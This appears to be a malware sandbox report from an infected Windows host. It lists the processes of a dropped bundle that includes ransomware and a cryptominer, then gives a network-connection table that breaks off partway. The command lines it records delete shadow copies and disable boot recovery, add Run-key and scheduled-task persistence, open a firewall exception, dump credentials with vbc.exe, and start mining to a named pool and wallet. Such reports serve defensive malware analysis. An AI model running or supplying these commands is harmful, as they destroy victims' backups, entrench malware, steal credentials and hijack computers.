"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___WTFUXJ8_.hta"
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___WHOILPL_.txt
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\build3.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\2024.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc5.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe
C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\2024.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\2024.exe
C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\93A8.tmp\spwak.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im E
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\build3.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\build3.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\980B.tmp\splitterrypted.vbs
C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
C:\Program Files (x86)\Microsoft\DesktopLayer.exe
"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc5.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc5.exe
C:\Windows\SysWOW64\wscript.exe
C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\980B.tmp\splitterrypted.vbs
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1620 CREDAT:275457 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\PING.EXE
ping -n 1 127.0.0.1
C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe
"C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\build3.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\build3.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Windows\SysWOW64\wscript.exe
C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\93A8.tmp\spwak.vbs
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1620 CREDAT:472069 /prefetch:2
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Users\Admin\Desktop\5.exe
"C:\Users\Admin\Desktop\5.exe"
C:\Users\Admin\AppData\Local\Temp\is-NNBEH.tmp\tuc5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NNBEH.tmp\tuc5.tmp" /SL5="$60170,4511781,54272,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc5.exe"
C:\Users\Admin\Desktop\6.exe
"C:\Users\Admin\Desktop\6.exe"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
C:\Users\Admin\Desktop\7.exe
"C:\Users\Admin\Desktop\7.exe"
C:\Users\Admin\Desktop\8.exe
"C:\Users\Admin\Desktop\8.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm"
C:\PROGRA~3\system.exe
C:\PROGRA~3\system.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp7668.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0xc4
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "system" /sc ONLOGON /tr "'C:\ProgramData\freebl3\system.exe'" /rl HIGHEST /f
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "6" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\6.exe'" /rl HIGHEST /f
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c timeout /t 5 & del /f /q C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "enuqrziy120" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "enuqrziy120" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {7E853A63-1D73-49DD-9AA7-22CA0C93FAD8} S-1-5-21-3308111660-3636268597-2291490419-1000:JUBFGPHD\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
Network
| Country | Destination | Domain | Proto |
| DE | 131.188.40.189:443 | tcp | |
| US | 8.8.8.8:53 | stats.walliant.com | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| N/A | 127.0.0.1:49325 | tcp | |
| US | 104.21.57.77:443 | stats.walliant.com | tcp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | api.joinmassive.com | udp |
| US | 18.172.89.91:443 | api.joinmassive.com | tcp |
| US | 18.172.89.91:443 | api.joinmassive.com | tcp |
| IE | 93.107.12.0:6893 | udp | |
| IE | 93.107.12.1:6893 | udp | |
| IE | 93.107.12.2:6893 | udp | |
| IE | 93.107.12.3:6893 | udp | |
| IE | 93.107.12.4:6893 | udp | |
| IE | 93.107.12.5:6893 | udp | |
| IE | 93.107.12.6:6893 | udp | |
| IE | 93.107.12.7:6893 | udp | |
| IE | 93.107.12.8:6893 | udp | |
| IE | 93.107.12.9:6893 | udp | |
| IE | 93.107.12.10:6893 | udp | |
| IE | 93.107.12.11:6893 | udp | |
| IE | 93.107.12.12:6893 | udp | |
| IE | 93.107.12.13:6893 | udp | |
| IE | 93.107.12.14:6893 | udp | |
| IE | 93.107.12.15:6893 | udp | |
| IE | 93.107.12.16:6893 | udp | |
| IE | 93.107.12.17:6893 | udp | |
| IE | 93.107.12.18:6893 | udp | |
| IE | 93.107.12.19:6893 | udp | |
| IE | 93.107.12.20:6893 | udp | |
| IE | 93.107.12.21:6893 | udp | |
| IE | 93.107.12.22:6893 | udp | |
| IE | 93.107.12.23:6893 | udp | |
| IE | 93.107.12.24:6893 | udp | |
| IE | 93.107.12.25:6893 | udp | |
| IE | 93.107.12.26:6893 | udp | |
| IE | 93.107.12.27:6893 | udp | |
| IE | 93.107.12.28:6893 | udp | |
| IE | 93.107.12.29:6893 | udp | |
| IE | 93.107.12.30:6893 | udp | |
| IE | 93.107.12.31:6893 | udp | |
| TR | 95.1.200.0:6893 | udp | |
| TR | 95.1.200.1:6893 | udp | |
| TR | 95.1.200.2:6893 | udp | |
| TR | 95.1.200.3:6893 | udp | |
| TR | 95.1.200.4:6893 | udp | |
| TR | 95.1.200.5:6893 | udp | |
| TR | 95.1.200.6:6893 | udp | |
| TR | 95.1.200.7:6893 | udp | |
| TR | 95.1.200.8:6893 | udp | |
| TR | 95.1.200.9:6893 | udp | |
| TR | 95.1.200.10:6893 | udp | |
| TR | 95.1.200.11:6893 | udp | |
| TR | 95.1.200.12:6893 | udp | |
| TR | 95.1.200.13:6893 | udp | |
| TR | 95.1.200.14:6893 | udp | |
| TR | 95.1.200.15:6893 | udp | |
| TR | 95.1.200.16:6893 | udp | |
| TR | 95.1.200.17:6893 | udp | |
| TR | 95.1.200.18:6893 | udp | |
| TR | 95.1.200.19:6893 | udp | |
| TR | 95.1.200.20:6893 | udp | |
| TR | 95.1.200.21:6893 | udp | |
| TR | 95.1.200.22:6893 | udp | |
| TR | 95.1.200.23:6893 | udp | |
| TR | 95.1.200.24:6893 | udp | |
| TR | 95.1.200.25:6893 | udp | |
| TR | 95.1.200.26:6893 | udp | |
| TR | 95.1.200.27:6893 | udp | |
| TR | 95.1.200.28:6893 | udp | |
| TR | 95.1.200.29:6893 | udp | |
| TR | 95.1.200.30:6893 | udp | |
| TR | 95.1.200.31:6893 | udp | |
| FR | 87.98.176.0:6893 | udp | |
| FR | 87.98.176.1:6893 | udp | |
| FR | 87.98.176.2:6893 | udp | |
| FR | 87.98.176.3:6893 | udp | |
| FR | 87.98.176.4:6893 | udp | |
| FR | 87.98.176.5:6893 | udp | |
| FR | 87.98.176.6:6893 | udp | |
| FR | 87.98.176.7:6893 | udp | |
| FR | 87.98.176.8:6893 | udp | |
| FR | 87.98.176.9:6893 | udp | |
| FR | 87.98.176.10:6893 | udp | |
| FR | 87.98.176.11:6893 | udp | |
| FR | 87.98.176.12:6893 | udp | |
| FR | 87.98.176.13:6893 | udp | |
| FR | 87.98.176.14:6893 | udp | |
| FR | 87.98.176.15:6893 | udp | |
| FR | 87.98.176.16:6893 | udp | |
| FR | 87.98.176.17:6893 | udp | |
| FR | 87.98.176.18:6893 | udp | |
| FR | 87.98.176.19:6893 | udp | |
| FR | 87.98.176.20:6893 | udp | |
| FR | 87.98.176.21:6893 | udp | |
| FR | 87.98.176.22:6893 | udp | |
| FR | 87.98.176.23:6893 | udp | |
| FR | 87.98.176.24:6893 | udp | |
| FR | 87.98.176.25:6893 | udp | |
| FR | 87.98.176.26:6893 | udp | |
| FR | 87.98.176.27:6893 | udp | |
| FR | 87.98.176.28:6893 | udp | |
| FR | 87.98.176.29:6893 | udp | |
| FR | 87.98.176.30:6893 | udp | |
| FR | 87.98.176.31:6893 | udp | |
| FR | 87.98.176.32:6893 | udp | |
| FR | 87.98.176.33:6893 | udp | |
| FR | 87.98.176.34:6893 | udp | |
| FR | 87.98.176.35:6893 | udp | |
| FR | 87.98.176.36:6893 | udp | |
| FR | 87.98.176.37:6893 | udp | |
| FR | 87.98.176.38:6893 | udp | |
| FR | 87.98.176.39:6893 | udp | |
| FR | 87.98.176.40:6893 | udp | |
| FR | 87.98.176.41:6893 | udp | |
| FR | 87.98.176.42:6893 | udp | |
| FR | 87.98.176.43:6893 | udp | |
| FR | 87.98.176.44:6893 | udp | |
| FR | 87.98.176.45:6893 | udp | |
| FR | 87.98.176.46:6893 | udp | |
| FR | 87.98.176.47:6893 | udp | |
| FR | 87.98.176.48:6893 | udp | |
| FR | 87.98.176.49:6893 | udp | |
| FR | 87.98.176.50:6893 | udp | |
| FR | 87.98.176.51:6893 | udp | |
| FR | 87.98.176.52:6893 | udp | |
| FR | 87.98.176.53:6893 | udp | |
| FR | 87.98.176.54:6893 | udp | |
| FR | 87.98.176.55:6893 | udp | |
| FR | 87.98.176.56:6893 | udp | |
| FR | 87.98.176.57:6893 | udp | |
| FR | 87.98.176.58:6893 | udp | |
| FR | 87.98.176.59:6893 | udp | |
| FR | 87.98.176.60:6893 | udp | |
| FR | 87.98.176.61:6893 | udp | |
| FR | 87.98.176.62:6893 | udp | |
| FR | 87.98.176.63:6893 | udp | |
| FR | 87.98.176.64:6893 | udp | |
| FR | 87.98.176.65:6893 | udp | |
| FR | 87.98.176.66:6893 | udp | |
| FR | 87.98.176.67:6893 | udp | |
| FR | 87.98.176.68:6893 | udp | |
| FR | 87.98.176.69:6893 | udp | |
| FR | 87.98.176.70:6893 | udp | |
| FR | 87.98.176.71:6893 | udp | |
| FR | 87.98.176.72:6893 | udp | |
| FR | 87.98.176.73:6893 | udp | |
| FR | 87.98.176.74:6893 | udp | |
| FR | 87.98.176.75:6893 | udp | |
| FR | 87.98.176.76:6893 | udp | |
| FR | 87.98.176.77:6893 | udp | |
| FR | 87.98.176.78:6893 | udp | |
| FR | 87.98.176.79:6893 | udp | |
| FR | 87.98.176.80:6893 | udp | |
| FR | 87.98.176.81:6893 | udp | |
| FR | 87.98.176.82:6893 | udp | |
| FR | 87.98.176.83:6893 | udp | |
| FR | 87.98.176.84:6893 | udp | |
| FR | 87.98.176.85:6893 | udp | |
| FR | 87.98.176.86:6893 | udp | |
| FR | 87.98.176.87:6893 | udp | |
| FR | 87.98.176.88:6893 | udp | |
| FR | 87.98.176.89:6893 | udp | |
| FR | 87.98.176.90:6893 | udp | |
| FR | 87.98.176.91:6893 | udp | |
| FR | 87.98.176.92:6893 | udp | |
| FR | 87.98.176.93:6893 | udp | |
| FR | 87.98.176.94:6893 | udp | |
| FR | 87.98.176.95:6893 | udp | |
| FR | 87.98.176.96:6893 | udp | |
| FR | 87.98.176.97:6893 | udp | |
| FR | 87.98.176.98:6893 | udp | |
| FR | 87.98.176.99:6893 | udp | |
| FR | 87.98.176.100:6893 | udp | |
| FR | 87.98.176.101:6893 | udp | |
| FR | 87.98.176.102:6893 | udp | |
| FR | 87.98.176.103:6893 | udp | |
| FR | 87.98.176.104:6893 | udp | |
| FR | 87.98.176.105:6893 | udp | |
| FR | 87.98.176.106:6893 | udp | |
| FR | 87.98.176.107:6893 | udp | |
| FR | 87.98.176.108:6893 | udp | |
| FR | 87.98.176.109:6893 | udp | |
| FR | 87.98.176.110:6893 | udp | |
| FR | 87.98.176.111:6893 | udp | |
| FR | 87.98.176.112:6893 | udp | |
| FR | 87.98.176.113:6893 | udp | |
| FR | 87.98.176.114:6893 | udp | |
| FR | 87.98.176.115:6893 | udp | |
| FR | 87.98.176.116:6893 | udp | |
| FR | 87.98.176.117:6893 | udp | |
| FR | 87.98.176.118:6893 | udp | |
| FR | 87.98.176.119:6893 | udp | |
| FR | 87.98.176.120:6893 | udp | |
| FR | 87.98.176.121:6893 | udp | |
| FR | 87.98.176.122:6893 | udp | |
| FR | 87.98.176.123:6893 | udp | |
| FR | 87.98.176.124:6893 | udp | |
| FR | 87.98.176.125:6893 | udp | |
| FR | 87.98.176.126:6893 | udp | |
| FR | 87.98.176.127:6893 | udp | |
| FR | 87.98.176.128:6893 | udp | |
| FR | 87.98.176.129:6893 | udp | |
| FR | 87.98.176.130:6893 | udp | |
| FR | 87.98.176.131:6893 | udp | |
| FR | 87.98.176.132:6893 | udp | |
| FR | 87.98.176.133:6893 | udp | |
| FR | 87.98.176.134:6893 | udp | |
| FR | 87.98.176.135:6893 | udp | |
| FR | 87.98.176.136:6893 | udp | |
| FR | 87.98.176.137:6893 | udp | |
| FR | 87.98.176.138:6893 | udp | |
| FR | 87.98.176.139:6893 | udp | |
| FR | 87.98.176.140:6893 | udp | |
| FR | 87.98.176.141:6893 | udp | |
| FR | 87.98.176.142:6893 | udp | |
| FR | 87.98.176.143:6893 | udp | |
| FR | 87.98.176.144:6893 | udp | |
| FR | 87.98.176.145:6893 | udp | |
| FR | 87.98.176.146:6893 | udp | |
| FR | 87.98.176.147:6893 | udp | |
| FR | 87.98.176.148:6893 | udp | |
| FR | 87.98.176.149:6893 | udp | |
| FR | 87.98.176.150:6893 | udp | |
| FR | 87.98.176.151:6893 | udp | |
| FR | 87.98.176.152:6893 | udp | |
| FR | 87.98.176.153:6893 | udp | |
| FR | 87.98.176.154:6893 | udp | |
| FR | 87.98.176.155:6893 | udp | |
| FR | 87.98.176.156:6893 | udp | |
| FR | 87.98.176.157:6893 | udp | |
| FR | 87.98.176.158:6893 | udp | |
| FR | 87.98.176.159:6893 | udp | |
| FR | 87.98.176.160:6893 | udp | |
| FR | 87.98.176.161:6893 | udp | |
| FR | 87.98.176.162:6893 | udp | |
| FR | 87.98.176.163:6893 | udp | |
| FR | 87.98.176.164:6893 | udp | |
| FR | 87.98.176.165:6893 | udp | |
| FR | 87.98.176.166:6893 | udp | |
| FR | 87.98.176.167:6893 | udp | |
| FR | 87.98.176.168:6893 | udp | |
| FR | 87.98.176.169:6893 | udp | |
| FR | 87.98.176.170:6893 | udp | |
| FR | 87.98.176.171:6893 | udp | |
| FR | 87.98.176.172:6893 | udp | |
| FR | 87.98.176.173:6893 | udp | |
| FR | 87.98.176.174:6893 | udp | |
| FR | 87.98.176.175:6893 | udp | |
| FR | 87.98.176.176:6893 | udp | |
| FR | 87.98.176.177:6893 | udp | |
| FR | 87.98.176.178:6893 | udp | |
| FR | 87.98.176.179:6893 | udp | |
| FR | 87.98.176.180:6893 | udp | |
| FR | 87.98.176.181:6893 | udp | |
| FR | 87.98.176.182:6893 | udp | |
| FR | 87.98.176.183:6893 | udp | |
| FR | 87.98.176.184:6893 | udp | |
| FR | 87.98.176.185:6893 | udp | |
| FR | 87.98.176.186:6893 | udp | |
| FR | 87.98.176.187:6893 | udp | |
| FR | 87.98.176.188:6893 | udp | |
| FR | 87.98.176.189:6893 | udp | |
| FR | 87.98.176.190:6893 | udp | |
| FR | 87.98.176.191:6893 | udp | |
| FR | 87.98.176.192:6893 | udp | |
| FR | 87.98.176.193:6893 | udp | |
| FR | 87.98.176.194:6893 | udp | |
| FR | 87.98.176.195:6893 | udp | |
| FR | 87.98.176.196:6893 | udp | |
| FR | 87.98.176.197:6893 | udp | |
| FR | 87.98.176.198:6893 | udp | |
| FR | 87.98.176.199:6893 | udp | |
| FR | 87.98.176.200:6893 | udp | |
| FR | 87.98.176.201:6893 | udp | |
| FR | 87.98.176.202:6893 | udp | |
| FR | 87.98.176.203:6893 | udp | |
| FR | 87.98.176.204:6893 | udp | |
| FR | 87.98.176.205:6893 | udp | |
| FR | 87.98.176.206:6893 | udp | |
| FR | 87.98.176.207:6893 | udp | |
| FR | 87.98.176.208:6893 | udp | |
| FR | 87.98.176.209:6893 | udp | |
| FR | 87.98.176.210:6893 | udp | |
| FR | 87.98.176.211:6893 | udp | |
| FR | 87.98.176.212:6893 | udp | |
| FR | 87.98.176.213:6893 | udp | |
| FR | 87.98.176.214:6893 | udp | |
| FR | 87.98.176.215:6893 | udp | |
| FR | 87.98.176.216:6893 | udp | |
| FR | 87.98.176.217:6893 | udp | |
| FR | 87.98.176.218:6893 | udp | |
| FR | 87.98.176.219:6893 | udp | |
| FR | 87.98.176.220:6893 | udp | |
| FR | 87.98.176.221:6893 | udp | |
| FR | 87.98.176.222:6893 | udp | |
| FR | 87.98.176.223:6893 | udp | |
| FR | 87.98.176.224:6893 | udp | |
| FR | 87.98.176.225:6893 | udp | |
| FR | 87.98.176.226:6893 | udp | |
| FR | 87.98.176.227:6893 | udp | |
| FR | 87.98.176.228:6893 | udp | |
| FR | 87.98.176.229:6893 | udp | |
| FR | 87.98.176.230:6893 | udp | |
| FR | 87.98.176.231:6893 | udp | |
| FR | 87.98.176.232:6893 | udp | |
| FR | 87.98.176.233:6893 | udp | |
| FR | 87.98.176.234:6893 | udp | |
| FR | 87.98.176.235:6893 | udp | |
| FR | 87.98.176.236:6893 | udp | |
| FR | 87.98.176.237:6893 | udp | |
| FR | 87.98.176.238:6893 | udp | |
| FR | 87.98.176.239:6893 | udp | |
| FR | 87.98.176.240:6893 | udp | |
| FR | 87.98.176.241:6893 | udp | |
| FR | 87.98.176.242:6893 | udp | |
| FR | 87.98.176.243:6893 | udp | |
| FR | 87.98.176.244:6893 | udp | |
| FR | 87.98.176.245:6893 | udp | |
| FR | 87.98.176.246:6893 | udp | |
| FR | 87.98.176.247:6893 | udp | |
| FR | 87.98.176.248:6893 | udp | |
| FR | 87.98.176.249:6893 | udp | |
| FR | 87.98.176.250:6893 | udp | |
| FR | 87.98.176.251:6893 | udp | |
| FR | 87.98.176.252:6893 | udp | |
| FR | 87.98.176.253:6893 | udp | |
| FR | 87.98.176.254:6893 | udp | |
| FR | 87.98.176.255:6893 | udp | |
| FR | 87.98.177.0:6893 | udp | |
| FR | 87.98.177.1:6893 | udp | |
| FR | 87.98.177.2:6893 | udp | |
| FR | 87.98.177.3:6893 | udp | |
| FR | 87.98.177.4:6893 | udp | |
| FR | 87.98.177.5:6893 | udp | |
| FR | 87.98.177.6:6893 | udp | |
| FR | 87.98.177.7:6893 | udp | |
| FR | 87.98.177.8:6893 | udp | |
| FR | 87.98.177.9:6893 | udp | |
| FR | 87.98.177.10:6893 | udp | |
| FR | 87.98.177.11:6893 | udp | |
| FR | 87.98.177.12:6893 | udp | |
| FR | 87.98.177.13:6893 | udp | |
| FR | 87.98.177.14:6893 | udp | |
| FR | 87.98.177.15:6893 | udp | |
| FR | 87.98.177.16:6893 | udp | |
| FR | 87.98.177.17:6893 | udp | |
| FR | 87.98.177.18:6893 | udp | |
| FR | 87.98.177.19:6893 | udp | |
| FR | 87.98.177.20:6893 | udp | |
| FR | 87.98.177.21:6893 | udp | |
| FR | 87.98.177.22:6893 | udp | |
| FR | 87.98.177.23:6893 | udp | |
| FR | 87.98.177.24:6893 | udp | |
| FR | 87.98.177.25:6893 | udp | |
| FR | 87.98.177.26:6893 | udp | |
| FR | 87.98.177.27:6893 | udp | |
| FR | 87.98.177.28:6893 | udp | |
| FR | 87.98.177.29:6893 | udp | |
| FR | 87.98.177.30:6893 | udp | |
| FR | 87.98.177.31:6893 | udp | |
| FR | 87.98.177.32:6893 | udp | |
| FR | 87.98.177.33:6893 | udp | |
| FR | 87.98.177.34:6893 | udp | |
| FR | 87.98.177.35:6893 | udp | |
| FR | 87.98.177.36:6893 | udp | |
| FR | 87.98.177.37:6893 | udp | |
| FR | 87.98.177.38:6893 | udp | |
| FR | 87.98.177.39:6893 | udp | |
| FR | 87.98.177.40:6893 | udp | |
| FR | 87.98.177.41:6893 | udp | |
| FR | 87.98.177.42:6893 | udp | |
